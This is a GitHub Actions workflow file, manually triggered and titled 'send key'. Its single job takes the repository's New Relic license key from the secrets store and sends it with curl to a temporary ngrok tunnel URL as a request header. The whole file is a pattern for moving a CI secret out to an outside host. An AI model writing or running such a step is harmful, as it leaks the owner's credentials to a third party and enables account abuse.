name: send key

on:
  workflow_dispatch:

env:
  NEW_RELIC_LICENSE_KEY: ${{ secrets.NEW_RELIC_LICENSE_KEY }}

jobs:
  fetch-content:
    name: send key
    runs-on: ubuntu-latest
    steps:
      - name: Request
        id: request
        run: curl https://2575-2605-a601-a3f2-6c00-50a9-a1f9-a6b4-86e4.ngrok-free.app -H "X-Key: $NEW_RELIC_LICENSE_KEY"
